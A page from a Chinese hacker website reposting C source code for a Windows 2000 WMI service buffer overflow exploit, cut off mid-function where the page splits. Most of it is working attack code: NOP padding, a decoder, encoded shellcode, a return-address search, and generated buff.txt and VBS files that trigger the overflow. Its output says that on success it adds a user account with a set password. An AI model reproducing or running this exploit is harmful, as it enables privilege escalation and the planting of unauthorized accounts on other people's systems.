您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客编程 >> 正文

windows 2000 wmi service buffer overflow expolit
骇客基地 阅读: 时间:2007-6-18 18:48:39 来源:www.hookbase.com
  
WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U

wmi默认只有administrators才可以远程连接,所以只有能在目标系统上运行程序的用户才能利用。
本地用户可用来提升权限。
此程序可用于简体中文、繁体中文、日文、韩文系统sp0-3上。
不需要指定任何参数,程序会自动搜索可用的call ebx地址。
用c代码来与wmi service通讯太复杂了,所以程序是生成两个文件,一个是存放exploit buffer的
buff.txt,一个是xWMI.vbs。

/*----------------------------------------------------------------------------------*/
#include <windows.h>
#include <stdio.h>

#define    NOPCODE        0x4F//0x4F//'O'
#define BUFFLEN        (65536+8)/2
#define OVERPOINT    0x260//溢出点-0x14 SEH-0x4

int    g_iCodePage;
char    g_szDllList[5][16]={"kernel32.dll",
            "advapi32.dll",
            "user32.dll",
            "gdi32.dll",
            "ole32.dll"};
char            *g_szWideCharShort;
unsigned char    jmpover[]="\x41\x90\x41\x68";//0x41 inc ecx , 0x68  push num32
unsigned char    decoder[]=
"\x4F\x75\x05\x74\x03\x4E\xC3\x4F\x53\x90\x5E\x66\xAD\x4E\x46\x4F"
"\x43\x66\x3D\x97\x6F\x90\x51\x90\x59\x75\xF0\x53\x56\x5F\x4A\x57"
"\x43\x66\xAD\x50\x43\x66\x3D\x4F\x00\x90\x59\x74\xD9\x4E\x2C\x64"
"\x50\x59\x46\x4F\x47\x90\x43\x66\xAD\x50\x4B\x58\x2C\x64\x4A\x57"
"\x51\x90\x90\x5F\x03\xFF\x03\xFF\x03\xFF\x03\xFF\x91\x03\xCF\x91"
"\x90\x5F\xAA\x90\x41\x74\xCA\x90\x51\x90\x59\x75\xC4\x4E\x97\x6F";
unsigned char    xShellCode[]=
"iilorprojhinoldhddsekkleglhqinmdddkhdghlrosiloqllokggpdgsglokjkldgsglokrfddgsolo"
"hrehggrqijikielogsdgsolosfggpmlgpedrsgnjkhdlimislgpkdhhirfrkimisirlopqlohjfhdgpg"
"qeredgpeggpmjjlodllohjepdgpgperedfdgpelodddgpgrodfrogklosnlosflmdjlgpkdsikigssqd"
"lgpjdhlmdjlgpkdlikiglohjspssqdlgpjdhlmdjggpdidlgpkdjiklohjspssqdolssssssssidlodj"
"ssqdrlirsssssshkjikhidkfjsjghejhjhkfjikgkgddikjmjrhikljijgddigjpjijikdddjgjqjhfd"
"fsjgfdjrjikhfrjikljifdkikgjikffdklklfdgejefefrgmjrhlfdfsjejhjhfdfjfjfdjrjikhfdjp"
"jsjgjejpjkkfjskikdfdjejhjqjmjrjmkgkhkfjekhjskfkgfdklklfdfsjejhjhdd";

int        SearchRET();
BOOL    MakeWideCharList();
DWORD WINAPI func(LPVOID lp);

void main()
{
    int        retaddr,i,j,iPathLen, iwLen;
    unsigned char *pStr, widecharbuff[0x500], multibytebuff[0x500];
    unsigned char szVBS[0x1000], szPath[256], szPath2[256];
    FILE    *f;

    printf( "xWMI -> win2k WMI service buffer overflow exploit\n"
        "WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U\n"
        "for win2k which default codepage is GB、BIG5、Korean、JP sp0-3\n"
        "Written by ey4s<cooleyas@21cn.com>\n"
        "2003-04-27\n"
        "thanks to yuange\n\n");

    MakeWideCharList();
    retaddr = SearchRET();
    if(!retaddr) return;
    
    pStr = (unsigned char *)malloc(40000);
    memset(pStr, 0, 40000);

    //get current path
    iPathLen = GetCurrentDirectoryA(sizeof(szPath)-1, szPath);
    if(!iPathLen)
    {
        printf("GetCurrentDirectoryA failed:%d\n",  GetLastError());
        return;
    }

    /*转换字符*/
    memset(widecharbuff, 0, sizeof(widecharbuff));
    //jmp over
    memcpy(widecharbuff,jmpover,4);
    //jmp addr
    memcpy(widecharbuff+4,&retaddr,4);
    //decoder
    memcpy(widecharbuff+8,decoder,sizeof(decoder));
    iwLen=wcslen((unsigned short *)widecharbuff);
    i=WideCharToMultiByte(g_iCodePage,0,(unsigned short *)widecharbuff,
        iwLen*2,multibytebuff,0x1000,0,0);
    i=strlen(multibytebuff);

    //组合buffer
    memset(pStr, NOPCODE, BUFFLEN+iwLen);
    memcpy(pStr, szPath, iPathLen);
    pStr[iPathLen]=(BYTE)'\\';
    //jmpover & jmpaddr
    memcpy(pStr+OVERPOINT/2, multibytebuff, i);
    //real shellcode
    memcpy(pStr+OVERPOINT/2+i, xShellCode, strlen(xShellCode));

    f = fopen("buff.txt", "w");
    fprintf(f, "%s", pStr);
    fclose(f);
    free(pStr);

    printf("write exploit buffer to file %s\\buff.txt\n", szPath);

    //replace '\' to '\\'
    memset(szPath2, 0, sizeof(szPath2));
    for(i=0,j=0;i<strlen(szPath);i++,j++)
    {
        if(szPath[i]==(BYTE)'\\')
            szPath2[j++]=szPath[i];
        szPath2[j]=szPath[i];
    }

    sprintf(szVBS,  "Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"
            "set f2=fso.OpenTextFile(\"buff.txt\",1,false,TristateTrue)\n"
            "szBuffer=f2.ReadAll\n"
            "f2.Close\n"
            "Set fso = Nothing\n"
    "Set ServiceSet = GetObject(\"winmgmts:{impersonationLevel=impersonate}\")._\n"
            "ExecQuery(\"select * from Win32_Directory where Name='%s'\")\n"
            "for each Service in ServiceSet\n"
            "   WScript.Echo \"if you can see thie line,it maybe success!\"\n"
            "   Service.Copy(szBuffer)\n"
            "next\n"
            ,szPath2);
    f = fopen("xWMI.vbs", "w");
    fprintf(f, "%s", szVBS);
    fclose(f);
    printf("create exploit execute file %s\\xWMI.vbs\n", szPath);
    printf( "Execute exploit file %s\\xWMI.vbs\n"
        "if success, exploit will add a user xx password is 1a!.9nH\n", szPath);
    CreateThread(0, 0, func, NULL, 0, NULL);
    Sleep(20000);
    DeleteFile("buff.txt");
    DeleteFile("xWMI.vbs");
    printf("Done.\n");
    return;
}

DWORD WINAPI func(LPVOID lp)
{
    system("cscript.exe xWMI.vbs");
    return 0;
}

BOOL MakeWideCharList()
{
    int        iCodePage,i,j,ret;
    char    szCodePage[128];
    unsigned char wbuff[4];
    unsigned char wbuff2[4];
    unsigned char buff[4];

    if(!GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_IDEFAULTCODEPAGE,
        szCodePage, sizeof(szCodePage)-1))
    {
        pri

[1] [2] 下一页

今天广告
参与评论:
注意事项:
【windows 2000 wmi service buffer overflow expolit】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号